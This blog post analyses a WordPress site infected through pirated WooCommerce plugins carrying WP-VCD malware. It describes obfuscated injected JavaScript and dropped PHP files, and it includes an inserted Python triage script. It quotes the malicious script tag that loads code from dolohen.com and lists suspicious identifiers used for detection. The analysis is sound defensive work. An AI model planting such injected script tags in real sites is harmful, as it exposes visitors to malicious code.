Preface

While recently maintaining a WordPress website for a client, I came across a strange piece of code that caught my attention:

<script type="text/javascript" src="https://dolohen.com/apu.php?zoneid=2285981"></script>

I was able to see this referenced script through my personal web crawler, Kraken.

The tool is not yet available to the public as I am finishing a few touches, but here is part of the report it generated:

Here are a few of the domains that were randomly added to pages:

  • https://perf.cdnads.com/
  • https://dolohen.com/

Those links, especially the dolohen one, led me to some interesting JavaScript code, and I realised that some of it could be potentially dangerous.

Dolohen Overview

Here is a pastebin of the formatted code recovered from the dolohen domain:

https://pastebin.com/FMMbqhxk

I noticed pretty fast that the first strings set in the variable a were base64 encoded. Running a small loop, I reversed the encoding, and you can see the resulting list in this pastebin:

https://pastebin.com/h43WqBkc

We can see here a few strings that make us wonder what this JavaScript is really doing:

  • forcedPerfomanceCall
  • connectStart
  • tryToEscapeIframe
  • secureScriptInject
  • trackWindow

These are just a few examples of the keywords found in the decoded strings. This was enough to alarm me that this JavaScript was probably written with malicious intent, a suspicion strongly reinforced by the fact that the whole script was obfuscated.
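To show the decoding step described above in a repeatable way, here is an added Python example (not code from the post or from the dolohen script). It builds a constructed string table by base64-encoding a few of the decoded names listed above, then extracts the `var a=[...]` table from the script text, decodes each entry (trying the reversed text when a straight decode yields garbage), and flags entries matching the suspicious identifiers the post found; the keyword set and the sample script are assumptions for illustration.

```python
import base64
import binascii
import re
import string

# Identifiers the post found in the decoded string table (from the page).
SUSPICIOUS = {"forcedPerfomanceCall", "tryToEscapeIframe",
              "secureScriptInject", "trackWindow"}

# Constructed sample: an obfuscated string table built here by base64-encoding
# a few of the decoded names from the post. The real table is far longer.
_PLAIN = ["forcedPerfomanceCall", "connectStart", "tryToEscapeIframe",
          "secureScriptInject", "trackWindow", "https://dolohen.com/"]
SAMPLE_JS = "var a=[" + ",".join(
    '"%s"' % base64.b64encode(s.encode()).decode() for s in _PLAIN) + "];"

_PRINTABLE = set(string.printable)


def _decode_one(token):
    """Base64-decode one table entry; if the straight decode is not printable
    text, retry on the reversed token (a common obfuscator trick)."""
    for candidate in (token, token[::-1]):
        try:
            raw = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue
        if raw and set(raw) <= _PRINTABLE:
            return raw
    return None


def extract_string_table(js, var_name="a"):
    """Return the decoded entries of `var <var_name>=[...]` in the script."""
    m = re.search(r"var\s+%s\s*=\s*\[(.*?)\]" % re.escape(var_name), js, re.S)
    if not m:
        return []
    tokens = re.findall(r'"([A-Za-z0-9+/=]+)"', m.group(1))
    return [d for d in (_decode_one(t) for t in tokens) if d is not None]


def triage(js):
    """Decoded strings plus the sorted subset matching known-bad identifiers."""
    decoded = extract_string_table(js)
    flagged = sorted(s for s in decoded if s in SUSPICIOUS)
    return decoded, flagged


if __name__ == "__main__":
    decoded, flagged = triage(SAMPLE_JS)
    print("decoded:", decoded)
    print("flagged:", flagged)
```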

Back to the infection

Knowing the WordPress ecosystem quite well, I started looking at what could have changed in the files. I ran the following command:

find . -type f -mtime -10

so I could see all the files modified or created in the past 10 days. I noticed that a few files had been added to my wp-includes folder:

  • wp-includes/wp-tmp.php
  • wp-includes/wp-vcd.php
  • wp-includes/class.wp.php

Looking at the code in those files, I noticed a lot of code calling external URLs or trying to inject data into the database.

At this point I knew the website had been compromised. I ran a plugin scan and detected two plugins that were harmful to the website:

  • woocommerce cost of goods
  • woocommerce customer order csv export

From here on I kept investigating and found more and more code that those plugins injected. In a way it is pretty smart, as the external links are only added if the user isn't part of the managing team.

Looking at WP-VCD

Some of the code executed through those plugins was placed in a file called:

wp-vcd.php

Here is a copy of the file:

https://pastebin.com/TT1WwXZs

By decoding the first base64 string, installcode, we can clearly see the malicious intent of the code. Here is a copy of installcode decoded:

https://pastebin.com/GgXM6v2s

From this install code we can clearly see how it sends a request to a domain to fetch code (line 69), which is later written into a file.

We can see in the install code how it clearly creates the following file:

  • wp-tmp.php

Here is a dump of said file:

https://pastebin.com/ZXqBiCvw

We can clearly see how the JavaScript is injected into pages (lines 11, 12, 22 and 23).

Postface

Having later checked and compared with backups, and having checked logs, file information and more, I'm pretty sure it came from those plugins, as installing them was the only action the client took in those recent days, looking at the events.

Upon further investigation I can't verify from which source the plugins were downloaded, but this is a clear example of why companies should take the time to analyze their needs and not hesitate to pay for the desired functionalities instead of going to shady sources.

The attempt to save a few dollars ended up in a wide infection of the platform, which resulted in many hours of meticulous analysis to clean it and make the platform functional once more.

Burlet Mederic